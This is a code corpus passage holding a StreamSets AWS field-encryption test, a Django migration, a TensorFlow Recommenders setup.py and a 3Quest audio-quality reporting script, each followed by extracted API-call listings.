raw_data = json.dumps(dict(message=MESSAGE_TEXT))
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON', raw_data=raw_data, stop_after_first_batch=True)
field_encrypt = pipeline_builder.add_stage('Encrypt and Decrypt Fields', type='processor')
field_encrypt.set_attributes(cipher='ALG_AES_256_GCM_IV12_TAG16_HKDF_SHA384_ECDSA_P384',
data_key_caching=False,
fields=['/message'],
frame_size=4096,
mode='ENCRYPT')
wiretap = pipeline_builder.add_wiretap()
dev_raw_data_source >> field_encrypt >> wiretap.destination
pipeline = pipeline_builder.build('Field Encryption Pipeline').configure_for_environment(aws)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
ciphertext_encoded = wiretap.output_records[0].get_field_data('/message')
# Decrypt received value using aws_encryption_sdk for verification purpose.
actual_value, _ = aws.decrypt(ciphertext_encoded.value)
assert actual_value == expected_plaintext
@sdc_min_version('3.17.0')
def test_field_encrypt_el(sdc_builder, sdc_executor):
"""Test to verify that EL functions work by using Base64 EL
Use processor to encrypt and decrypt data with a random key that
is encoded using an EL
The pipeline looks like:
dev_raw_data_source >> field_encrypt >> field_decrypt >> wiretap
"""
expected_plaintext = MESSAGE_TEXT
raw_data = json.dumps(dict(message=MESSAGE_TEXT))
key = get_random_string(length=32)
key_el = "${base64:encodeString('" + key + "', false, 'utf-8')}"
pipeline_builder = sdc_builder.get_pipeline_builder()
dev_raw_data_source = pipeline_builder.add_stage('Dev Raw Data Source')
dev_raw_data_source.set_attributes(data_format='JSON', raw_data=raw_data, stop_after_first_batch=True)
field_encrypt = pipeline_builder.add_stage('Encrypt and Decrypt Fields', type='processor')
field_encrypt.set_attributes(cipher='ALG_AES_256_GCM_IV12_TAG16_NO_KDF',
base64_encoded_key=key_el,
data_key_caching=False,
frame_size=4096,
mode='ENCRYPT',
fields=['/message'])
field_decrypt = pipeline_builder.add_stage('Encrypt and Decrypt Fields', type='processor')
field_decrypt.set_attributes(cipher='ALG_AES_256_GCM_IV12_TAG16_NO_KDF',
base64_encoded_key=key_el,
data_key_caching=False,
frame_size=4096,
mode='DECRYPT',
fields=['/message'])
wiretap = pipeline_builder.add_wiretap()
dev_raw_data_source >> field_encrypt >> field_decrypt >> wiretap.destination
pipeline = pipeline_builder.build('Field Encryption Pipeline Base64 EL')
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
decrypted_value = wiretap.output_records[0].get_field_data('/message')
assert decrypted_value == expected_plaintext
| [
"logging.getLogger",
"base64.b64encode",
"streamsets.testframework.markers.sdc_min_version",
"streamsets.testframework.utils.get_random_string",
"pytest.fixture",
"streamsets.testframework.markers.aws",
"streamsets.testframework.markers.aws.encrypt",
"streamsets.testframework.markers.aws.decrypt",
"... | [((824, 851), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (841, 851), False, 'import logging\n'), ((880, 910), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (894, 910), False, 'import pytest\n'), ((1059, 1069), 'streamsets.testframework.markers.aws', 'aws', (['"""kms"""'], {}), "('kms')\n", (1062, 1069), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((1071, 1095), 'streamsets.testframework.markers.sdc_min_version', 'sdc_min_version', (['"""3.5.0"""'], {}), "('3.5.0')\n", (1086, 1095), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((4079, 4089), 'streamsets.testframework.markers.aws', 'aws', (['"""kms"""'], {}), "('kms')\n", (4082, 4089), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((4091, 4115), 'streamsets.testframework.markers.sdc_min_version', 'sdc_min_version', (['"""3.5.0"""'], {}), "('3.5.0')\n", (4106, 4115), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((5731, 5756), 'streamsets.testframework.markers.sdc_min_version', 'sdc_min_version', (['"""3.17.0"""'], {}), "('3.17.0')\n", (5746, 5756), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((2109, 2140), 'streamsets.testframework.markers.aws.encrypt', 'aws.encrypt', (['expected_plaintext'], {}), '(expected_plaintext)\n', (2120, 2140), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((5644, 5681), 'streamsets.testframework.markers.aws.decrypt', 'aws.decrypt', (['ciphertext_encoded.value'], {}), '(ciphertext_encoded.value)\n', (5655, 5681), False, 'from streamsets.testframework.markers import aws, sdc_min_version\n'), ((6186, 6214), 'streamsets.testframework.utils.get_random_string', 'get_random_string', ([], {'length': '(32)'}), '(length=32)\n', (6203, 6214), False, 'from streamsets.testframework.utils import get_random_string\n'), ((2969, 2997), 'streamsets.testframework.utils.Version', 'Version', (['sdc_builder.version'], {}), '(sdc_builder.version)\n', (2976, 2997), False, 'from streamsets.testframework.utils import Version\n'), ((3000, 3016), 'streamsets.testframework.utils.Version', 'Version', (['"""4.4.0"""'], {}), "('4.4.0')\n", (3007, 3016), False, 'from streamsets.testframework.utils import Version\n'), ((2406, 2434), 'base64.b64encode', 'base64.b64encode', (['ciphertext'], {}), '(ciphertext)\n', (2422, 2434), False, 'import base64\n')] |
# Generated by Django 2.2.5 on 2019-10-08 21:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('starboardscanner_app', '0002_auto_20191008_2338'),
]
operations = [
migrations.AlterField(
model_name='record',
name='created_by',
field=models.CharField(max_length=50),
),
]
| [
"django.db.models.CharField"
] | [((353, 384), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (369, 384), False, 'from django.db import migrations, models\n')] |
# Copyright 2021 The TensorFlow Recommenders Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TensorFlow Recommenders, a TensorFlow library for recommender systems."""
import pathlib
import setuptools
VERSION = "0.5.2"
long_description = (pathlib.Path(__file__).parent
.joinpath("README.md")
.read_text())
setuptools.setup(
name="tensorflow-recommenders",
version=VERSION,
description="Tensorflow Recommenders, a TensorFlow library for recommender systems.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/tensorflow/recommenders",
author="Google Inc.",
author_email="<EMAIL>",
packages=setuptools.find_packages(),
install_requires=pathlib.Path("requirements.txt").read_text().splitlines(),
extras_require={
"docs": [
"fire",
"annoy",
"scann == 1.2.*",
],
},
# PyPI package information.
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Python Modules",
],
license="Apache 2.0",
keywords="tensorflow recommenders recommendations",
)
| [
"setuptools.find_packages",
"pathlib.Path"
] | [((1236, 1262), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (1260, 1262), False, 'import setuptools\n'), ((752, 774), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (764, 774), False, 'import pathlib\n'), ((1285, 1317), 'pathlib.Path', 'pathlib.Path', (['"""requirements.txt"""'], {}), "('requirements.txt')\n", (1297, 1317), False, 'import pathlib\n')] |
# 3/28/2020 Convert Nested JSON to Pandas DataFrame and Flatten List in a Column
# https://gist.github.com/rafaan/4ddc91ae47ea46a46c0b
# 6/25/2020 Initial
# 7/7/2020 Merge test_stort3Qdb.py and test_query3Qtable.py
########################################################
import json
from pandas.io.json import json_normalize
import pandas as pd
import os,sys,time,platform
strabspath=os.path.abspath(__file__)
strdirname=os.path.dirname(strabspath)
str_split=os.path.split(strdirname)
prevdirname=str_split[0]
dirnamelib=os.path.join(prevdirname,"lib")
dirnamelog=os.path.join(prevdirname,"logs")
sys.path.append(dirnamelib)
from logger import logger
from libCSV import *
import csvdataAnalysis as csvdata_analysis
import db_sqlite as db_sqlite
#import func_split_3channel as func_split_3ch
def trim_all_noise_wav(data,opt_verbose='OFF'):
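    # For every entry in data["3Quest"] that has label files and recorded wav files for
    # both the DUT mic and the stand mic, split/trim the recordings into per-label wav
    # files (using the 16 kHz / 48 kHz reference files and the start times read from the
    # label files), applying the configured per-channel gain. Entries with missing labels
    # or wav files are skipped with a log message.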
ref_fpath_16K = data["trim_ref_info"]['ref_fpath_16K']
ref_fpath_48K = data["trim_ref_info"]['ref_fpath_48K']
add_key = 'dut'
msg = 'data["trim_ref_info"][\'ref_fpath_16K\']: {}'
logger.info(msg.format(data["trim_ref_info"]['ref_fpath_16K']))
msg = 'data["trim_ref_info"][\'ref_fpath_48K\']: {}'
logger.info(msg.format(data["trim_ref_info"]['ref_fpath_48K']))
for i,_3quest in enumerate(data["3Quest"]):
if (data["3Quest"][i]['label_dut'] != '' and data["3Quest"][i]['label_standmic'] != ''\
and os.path.isfile(data["3Quest"][i]['mic_dut']) \
and os.path.isfile(data["3Quest"][i]['mic_standmic'])):#bypass without labels and dut, standmic wav file
#opt_verbose='ON'
#opt_verbose='OFF'
func_split_3ch.mkdir_folder(data["3Quest"][i]['path_dut'])
msg = 'data["3Quest"][{}][\'mic_dut\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['mic_dut']))
msg = 'data["3Quest"][{}][\'label_dut\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['label_dut']))
start_time, end_time, label = func_split_3ch.load_label_file(data["3Quest"][i]['label_dut'])
msg = 'data["3Quest"][{}][\'gain_dut\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['gain_dut']))
msg = 'data["3Quest"][{}][\'channel_dut\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['channel_dut']))
if (data["3Quest"][i]['channel_dut'] == 1):
func_split_3ch.func_gen_dut_wav_from_mono(data["3Quest"][i]['path_dut'], \
ref_fpath_16K, ref_fpath_48K, \
data["3Quest"][i]['mic_dut'], \
start_time, label, \
data["3Quest"][i]['gain_dut'], \
add_key, opt_verbose)
elif (data["3Quest"][i]['channel_dut'] == 2):
func_split_3ch.func_gen_dut_wav_from_stereo(data["3Quest"][i]['path_dut'], \
ref_fpath_16K, ref_fpath_48K, \
data["3Quest"][i]['mic_dut'], \
start_time, label, \
data["3Quest"][i]['gain_dut'], \
add_key, opt_verbose)
#msg = 'data["3Quest"][{}][\'path_standmic\']: {}'
#logger.info(msg.format(i,data["3Quest"][i]['path_standmic']))
func_split_3ch.mkdir_folder(data["3Quest"][i]['path_standmic'])
msg = 'data["3Quest"][{}][\'mic_standmic\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['mic_standmic']))
msg = 'data["3Quest"][{}][\'label_standmic\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['label_standmic']))
msg = 'data["3Quest"][{}][\'gain_standmic\']: {}'
logger.info(msg.format(i,data["3Quest"][i]['gain_standmic']))
start_time, end_time, label = func_split_3ch.load_label_file(data["3Quest"][i]['label_standmic'])
func_split_3ch.func_gen_standmic_wav(data["3Quest"][i]['path_standmic'], \
ref_fpath_16K, ref_fpath_48K, \
data["3Quest"][i]['mic_standmic'], \
start_time, label, \
data["3Quest"][i]['gain_standmic'], \
opt_verbose)
else:
msg = 'Please check data["3Quest"][{}][\'mic_dut\']:{} if exist or not?'
logger.info(msg.format(i, data["3Quest"][i]['mic_dut']))
msg = 'Please check data["3Quest"][{}][\'mic_standmic\']:{} if exist or not?'
logger.info(msg.format(i, data["3Quest"][i]['mic_standmic']))
def create3Qreport(data, local_time, opt_verbose='OFF'):
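    # For each DUT entry that has a '<path_dut>.3quest/Results' folder: collect the result
    # CSV files, strip their first row, parse the per-noise scores (SMOS/NMOS/GMOS/delta_SNR),
    # insert them into the SQLite database (only if this DUT path was not inserted before),
    # then query the table and write it out as an Excel report.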
for i,_3quest in enumerate(data["3Quest"]):
# Check path if exists or not
if(os.path.isdir(os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results'))):
'''
0th path_dut_3quest:..\logs\boommic_SWout\dut.3quest\Results
1th path_dut_3quest:..\logs\Intermic_SWin\dut.3quest\Results
'''
path_dut_3quest_results = os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results')
msg = '{}th path_dut_3quest_results:{}'
logger.info(msg.format(i, path_dut_3quest_results) )
file_type="*.csv"
ret_list_3questFolder_CsvFiles = walk_in_dir(path_dut_3quest_results,file_type)
local_csvdata_analysis = csvdata_analysis.CSVDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
local_csvdata_analysis.read_CSVFile()
tmp_csv=local_csvdata_analysis.write_CSVFile_del1strow()
# copy tmp.csv to output.csv of 3Quest Result Path
local_csvdata_analysis.copy_CSVFile_to3questResultPath(tmp_csv,\
local_csvdata_analysis._3questfolder_csvfiles)
local_csvdata_analysis = csvdata_analysis.PandasDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
# get list of all background noise 3Quest value
list_allnoises_3quest_values = local_csvdata_analysis.parse_CSVFile_02()
# prepare dut_foldername, insert_date, insert_time
path_dut = os.path.dirname(data["3Quest"][i]['path_dut'])
str_split=os.path.split(path_dut)
dut_foldername=str_split[1]
insert_date = str(local_time.tm_year)+str("{:02d}".format(local_time.tm_mon) )+str("{:02d}".format(local_time.tm_mday))
insert_time = str("{:02d}".format(local_time.tm_hour))+':'+str("{:02d}".format(local_time.tm_min))+':'+str("{:02d}".format(local_time.tm_sec))
# Ready to store 3Quest data to DB
if platform.system().lower() == 'windows': db_name_3quest = '3QuestDB.db'
if platform.system().lower() == 'linux': db_name_3quest = '3QuestDB_tensor4.db'
path_db = os.path.join(dirnamelog,db_name_3quest)
if opt_verbose.lower() == "on":
msg = "path_db: {}"
logger.info(msg.format(path_db))
localdb_sqlite = db_sqlite.DB_sqlite(path_db,\
dut_foldername,insert_date,insert_time,\
path_dut,\
opt_verbose)
# create a database connection
conn = localdb_sqlite.create_connection()
if conn is not None:
# create projects table
localdb_sqlite.create_all_tables_3Quest(conn)
else:
print("Error! cannot create the database connection.")
# Insert noise type data to DB
localdb_sqlite.insert_noise_file_tosqlite(localdb_sqlite, conn)
# Insert dut path data to DB to prevent 3Quest data redundancy
number_of_rows_3Quest_path = localdb_sqlite.insert_3quest_path_tosqlite(localdb_sqlite, conn)
if number_of_rows_3Quest_path < 1:# Insert if not exists
for list_noises_3quest_values in list_allnoises_3quest_values:
'''
INFO: list_noises_3quest_values:[['pub', 'pub', 'pub', 'pub'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['2.840550', '4.154481', '2.914813', '29.453750']]
INFO: list_noises_3quest_values:[['AVG', 'AVG', 'AVG', 'AVG'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['3.358136', '4.220144', '3.328679', '24.638061']]
'''
#Insert list_noises_3quest_values data into sqlite
localdb_sqlite.insert_csv_data_tosqlite(list_noises_3quest_values, \
localdb_sqlite, \
conn)
# create dataframe by SQL for excel report
localdb_sqlite.query_3quest_table(localdb_sqlite, conn)
# write dataframe to excel
localdb_sqlite.write_to_excel()
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
def test_create3Qreport_wonobgn_reAverage(data, local_time, opt_verbose='OFF'):
for i,_ in enumerate(data["3Quest"]):
# Check path if exists or not
if(os.path.isdir(os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results'))):
# prepare dut_foldername, insert_date, insert_time
path_dut = os.path.dirname(data["3Quest"][i]['path_dut'])
str_split=os.path.split(path_dut)
dut_foldername=str_split[1]
#insert_date = str(local_time.tm_year)+str("{:02d}".format(local_time.tm_mon) )+str("{:02d}".format(local_time.tm_mday))
insert_date = '20200713'
insert_time = str("{:02d}".format(local_time.tm_hour))+':'+str("{:02d}".format(local_time.tm_min))+':'+str("{:02d}".format(local_time.tm_sec))
# Ready to store 3Quest data to DB
if platform.system().lower() == 'windows': db_name_3quest = '3QuestDB.db'
if platform.system().lower() == 'linux': db_name_3quest = '3QuestDB_tensor4.db'
path_db = os.path.join(dirnamelog,db_name_3quest)
if opt_verbose.lower() == "on":
msg = "path_db: {}"
logger.info(msg.format(path_db))
localdb_sqlite = db_sqlite.DB_sqlite(path_db,\
dut_foldername,insert_date,insert_time,\
path_dut,\
opt_verbose)
# create a database connection
conn = localdb_sqlite.create_connection()
if conn is not None:
# create projects table
localdb_sqlite.create_all_tables_3Quest(conn)
else:
print("Error! cannot create the database connection.")
# Insert noise type data to DB
#localdb_sqlite.insert_noise_file_tosqlite(localdb_sqlite, conn)
# Insert dut path data to DB to prevent 3Quest data redundancy
#number_of_rows_3Quest_path = localdb_sqlite.insert_3quest_path_tosqlite(localdb_sqlite, conn)
#if number_of_rows_3Quest_path < 1:# Insert if not exists
# for list_noises_3quest_values in list_allnoises_3quest_values:
# '''
# INFO: list_noises_3quest_values:[['pub', 'pub', 'pub', 'pub'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['2.840550', '4.154481', '2.914813', '29.453750']]
# INFO: list_noises_3quest_values:[['AVG', 'AVG', 'AVG', 'AVG'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['3.358136', '4.220144', '3.328679', '24.638061']]
# '''
#Insert list_noises_3quest_values data into sqlite
# localdb_sqlite.insert_csv_data_tosqlite(list_noises_3quest_values, \
# localdb_sqlite, \
# conn)
# create dataframe by SQL for excel report
# localdb_sqlite.query_3quest_table_nobgnOnly(localdb_sqlite, conn)
# localdb_sqlite.query_3quest_table_withoutnobgn(localdb_sqlite, conn)
# write dataframe to excel
#localdb_sqlite.write_to_excel()
# test purpose
localdb_sqlite.query_3quest_table_nobgnOnly(localdb_sqlite, conn)
localdb_sqlite.query_3quest_table_withoutnobgn(localdb_sqlite, conn)
path_report_excel = os.path.join(path_dut, dut_foldername+'.xlsx')
df_3quest_table_excel= localdb_sqlite.df_query_3quest_table_noise.iloc [0:11, 1:8]
localdb_sqlite.write_to_excel_fromdata(path_report_excel,df_3quest_table_excel)
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
def create3Qreport_wonobgn_reAverage(data, local_time, opt_verbose='OFF'):
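    # Variant of create3Qreport: same CSV parsing and database insertion, but the report is
    # built from the 'nobgn only' and 'without nobgn' queries (presumably so the re-averaged
    # scores exclude the no-background-noise condition) and written to '<dut_foldername>.xlsx'
    # next to the DUT folder.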
for i,_3quest in enumerate(data["3Quest"]):
# Check path if exists or not
if(os.path.isdir(os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results'))):
'''
0th path_dut_3quest:..\logs\boommic_SWout\dut.3quest\Results
1th path_dut_3quest:..\logs\Intermic_SWin\dut.3quest\Results
'''
path_dut_3quest_results = os.path.join(data["3Quest"][i]['path_dut']+'.3quest', 'Results')
msg = '{}th path_dut_3quest_results:{}'
logger.info(msg.format(i, path_dut_3quest_results) )
file_type="*.csv"
ret_list_3questFolder_CsvFiles = walk_in_dir(path_dut_3quest_results,file_type)
local_csvdata_analysis = csvdata_analysis.CSVDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
local_csvdata_analysis.read_CSVFile()
tmp_csv=local_csvdata_analysis.write_CSVFile_del1strow()
# copy tmp.csv to output.csv of 3Quest Result Path
local_csvdata_analysis.copy_CSVFile_to3questResultPath(tmp_csv,\
local_csvdata_analysis._3questfolder_csvfiles)
local_csvdata_analysis = csvdata_analysis.PandasDataAnalysis(dirnamelog,\
path_dut_3quest_results,\
ret_list_3questFolder_CsvFiles
)
# get list of all background noise 3Quest value
list_allnoises_3quest_values = local_csvdata_analysis.parse_CSVFile_02()
# prepare dut_foldername, insert_date, insert_time
path_dut = os.path.dirname(data["3Quest"][i]['path_dut'])
str_split=os.path.split(path_dut)
dut_foldername=str_split[1]
insert_date = str(local_time.tm_year)+str("{:02d}".format(local_time.tm_mon) )+str("{:02d}".format(local_time.tm_mday))
insert_time = str("{:02d}".format(local_time.tm_hour))+':'+str("{:02d}".format(local_time.tm_min))+':'+str("{:02d}".format(local_time.tm_sec))
# Ready to store 3Quest data to DB
if platform.system().lower() == 'windows': db_name_3quest = '3QuestDB.db'
if platform.system().lower() == 'linux': db_name_3quest = '3QuestDB_tensor4.db'
path_db = os.path.join(dirnamelog,db_name_3quest)
if opt_verbose.lower() == "on":
msg = "path_db: {}"
logger.info(msg.format(path_db))
localdb_sqlite = db_sqlite.DB_sqlite(path_db,\
dut_foldername,insert_date,insert_time,\
path_dut,\
opt_verbose)
# create a database connection
conn = localdb_sqlite.create_connection()
if conn is not None:
# create projects table
localdb_sqlite.create_all_tables_3Quest(conn)
else:
print("Error! cannot create the database connection.")
# Insert noise type data to DB
localdb_sqlite.insert_noise_file_tosqlite(localdb_sqlite, conn)
# Insert dut path data to DB to prevent 3Quest data redundancy
number_of_rows_3Quest_path = localdb_sqlite.insert_3quest_path_tosqlite(localdb_sqlite, conn)
if number_of_rows_3Quest_path < 1:# Insert if not exists
for list_noises_3quest_values in list_allnoises_3quest_values:
'''
INFO: list_noises_3quest_values:[['pub', 'pub', 'pub', 'pub'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['2.840550', '4.154481', '2.914813', '29.453750']]
INFO: list_noises_3quest_values:[['AVG', 'AVG', 'AVG', 'AVG'], ['SMOS', 'NMOS', 'GMOS', 'delta_SNR'], ['3.358136', '4.220144', '3.328679', '24.638061']]
'''
#Insert list_noises_3quest_values data into sqlite
localdb_sqlite.insert_csv_data_tosqlite(list_noises_3quest_values, \
localdb_sqlite, \
conn)
# create dataframe by SQL for excel report
localdb_sqlite.query_3quest_table_nobgnOnly(localdb_sqlite, conn)
localdb_sqlite.query_3quest_table_withoutnobgn(localdb_sqlite, conn)
path_report_excel = os.path.join(path_dut, dut_foldername+'.xlsx')
# write dataframe to excel
df_3quest_table_excel= localdb_sqlite.df_query_3quest_table_noise.iloc [0:11, 1:8]
localdb_sqlite.write_to_excel_fromdata(path_report_excel,df_3quest_table_excel)
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
conn.close()
| [
"db_sqlite.DB_sqlite",
"csvdataAnalysis.CSVDataAnalysis",
"os.path.join",
"csvdataAnalysis.PandasDataAnalysis",
"os.path.split",
"os.path.isfile",
"os.path.dirname",
"platform.system",
"os.path.abspath",
"sys.path.append"
] | [((390, 415), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (405, 415), False, 'import os, sys, time, platform\n'), ((427, 454), 'os.path.dirname', 'os.path.dirname', (['strabspath'], {}), '(strabspath)\n', (442, 454), False, 'import os, sys, time, platform\n'), ((465, 490), 'os.path.split', 'os.path.split', (['strdirname'], {}), '(strdirname)\n', (478, 490), False, 'import os, sys, time, platform\n'), ((527, 559), 'os.path.join', 'os.path.join', (['prevdirname', '"""lib"""'], {}), "(prevdirname, 'lib')\n", (539, 559), False, 'import os, sys, time, platform\n'), ((570, 603), 'os.path.join', 'os.path.join', (['prevdirname', '"""logs"""'], {}), "(prevdirname, 'logs')\n", (582, 603), False, 'import os, sys, time, platform\n'), ((603, 630), 'sys.path.append', 'sys.path.append', (['dirnamelib'], {}), '(dirnamelib)\n', (618, 630), False, 'import os, sys, time, platform\n'), ((1398, 1442), 'os.path.isfile', 'os.path.isfile', (["data['3Quest'][i]['mic_dut']"], {}), "(data['3Quest'][i]['mic_dut'])\n", (1412, 1442), False, 'import os, sys, time, platform\n'), ((1461, 1510), 'os.path.isfile', 'os.path.isfile', (["data['3Quest'][i]['mic_standmic']"], {}), "(data['3Quest'][i]['mic_standmic'])\n", (1475, 1510), False, 'import os, sys, time, platform\n'), ((4792, 4858), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (4804, 4858), False, 'import os, sys, time, platform\n'), ((5077, 5143), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (5089, 5143), False, 'import os, sys, time, platform\n'), ((5437, 5542), 'csvdataAnalysis.CSVDataAnalysis', 'csvdata_analysis.CSVDataAnalysis', (['dirnamelog', 'path_dut_3quest_results', 'ret_list_3questFolder_CsvFiles'], {}), '(dirnamelog, path_dut_3quest_results,\n ret_list_3questFolder_CsvFiles)\n', (5469, 5542), True, 'import csvdataAnalysis as csvdata_analysis\n'), ((6135, 6243), 'csvdataAnalysis.PandasDataAnalysis', 'csvdata_analysis.PandasDataAnalysis', (['dirnamelog', 'path_dut_3quest_results', 'ret_list_3questFolder_CsvFiles'], {}), '(dirnamelog, path_dut_3quest_results,\n ret_list_3questFolder_CsvFiles)\n', (6170, 6243), True, 'import csvdataAnalysis as csvdata_analysis\n'), ((6644, 6690), 'os.path.dirname', 'os.path.dirname', (["data['3Quest'][i]['path_dut']"], {}), "(data['3Quest'][i]['path_dut'])\n", (6659, 6690), False, 'import os, sys, time, platform\n'), ((6713, 6736), 'os.path.split', 'os.path.split', (['path_dut'], {}), '(path_dut)\n', (6726, 6736), False, 'import os, sys, time, platform\n'), ((7312, 7352), 'os.path.join', 'os.path.join', (['dirnamelog', 'db_name_3quest'], {}), '(dirnamelog, db_name_3quest)\n', (7324, 7352), False, 'import os, sys, time, platform\n'), ((7516, 7613), 'db_sqlite.DB_sqlite', 'db_sqlite.DB_sqlite', (['path_db', 'dut_foldername', 'insert_date', 'insert_time', 'path_dut', 'opt_verbose'], {}), '(path_db, dut_foldername, insert_date, insert_time,\n path_dut, opt_verbose)\n', (7535, 7613), True, 'import db_sqlite as db_sqlite\n'), ((9957, 10023), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (9969, 10023), False, 'import os, sys, time, platform\n'), ((10113, 10159), 'os.path.dirname', 'os.path.dirname', (["data['3Quest'][i]['path_dut']"], {}), 
"(data['3Quest'][i]['path_dut'])\n", (10128, 10159), False, 'import os, sys, time, platform\n'), ((10182, 10205), 'os.path.split', 'os.path.split', (['path_dut'], {}), '(path_dut)\n', (10195, 10205), False, 'import os, sys, time, platform\n'), ((10819, 10859), 'os.path.join', 'os.path.join', (['dirnamelog', 'db_name_3quest'], {}), '(dirnamelog, db_name_3quest)\n', (10831, 10859), False, 'import os, sys, time, platform\n'), ((11023, 11120), 'db_sqlite.DB_sqlite', 'db_sqlite.DB_sqlite', (['path_db', 'dut_foldername', 'insert_date', 'insert_time', 'path_dut', 'opt_verbose'], {}), '(path_db, dut_foldername, insert_date, insert_time,\n path_dut, opt_verbose)\n', (11042, 11120), True, 'import db_sqlite as db_sqlite\n'), ((13420, 13468), 'os.path.join', 'os.path.join', (['path_dut', "(dut_foldername + '.xlsx')"], {}), "(path_dut, dut_foldername + '.xlsx')\n", (13432, 13468), False, 'import os, sys, time, platform\n'), ((14039, 14105), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (14051, 14105), False, 'import os, sys, time, platform\n'), ((14324, 14390), 'os.path.join', 'os.path.join', (["(data['3Quest'][i]['path_dut'] + '.3quest')", '"""Results"""'], {}), "(data['3Quest'][i]['path_dut'] + '.3quest', 'Results')\n", (14336, 14390), False, 'import os, sys, time, platform\n'), ((14684, 14789), 'csvdataAnalysis.CSVDataAnalysis', 'csvdata_analysis.CSVDataAnalysis', (['dirnamelog', 'path_dut_3quest_results', 'ret_list_3questFolder_CsvFiles'], {}), '(dirnamelog, path_dut_3quest_results,\n ret_list_3questFolder_CsvFiles)\n', (14716, 14789), True, 'import csvdataAnalysis as csvdata_analysis\n'), ((15382, 15490), 'csvdataAnalysis.PandasDataAnalysis', 'csvdata_analysis.PandasDataAnalysis', (['dirnamelog', 'path_dut_3quest_results', 'ret_list_3questFolder_CsvFiles'], {}), '(dirnamelog, path_dut_3quest_results,\n ret_list_3questFolder_CsvFiles)\n', (15417, 15490), True, 'import csvdataAnalysis as csvdata_analysis\n'), ((15891, 15937), 'os.path.dirname', 'os.path.dirname', (["data['3Quest'][i]['path_dut']"], {}), "(data['3Quest'][i]['path_dut'])\n", (15906, 15937), False, 'import os, sys, time, platform\n'), ((15960, 15983), 'os.path.split', 'os.path.split', (['path_dut'], {}), '(path_dut)\n', (15973, 15983), False, 'import os, sys, time, platform\n'), ((16559, 16599), 'os.path.join', 'os.path.join', (['dirnamelog', 'db_name_3quest'], {}), '(dirnamelog, db_name_3quest)\n', (16571, 16599), False, 'import os, sys, time, platform\n'), ((16763, 16860), 'db_sqlite.DB_sqlite', 'db_sqlite.DB_sqlite', (['path_db', 'dut_foldername', 'insert_date', 'insert_time', 'path_dut', 'opt_verbose'], {}), '(path_db, dut_foldername, insert_date, insert_time,\n path_dut, opt_verbose)\n', (16782, 16860), True, 'import db_sqlite as db_sqlite\n'), ((18827, 18875), 'os.path.join', 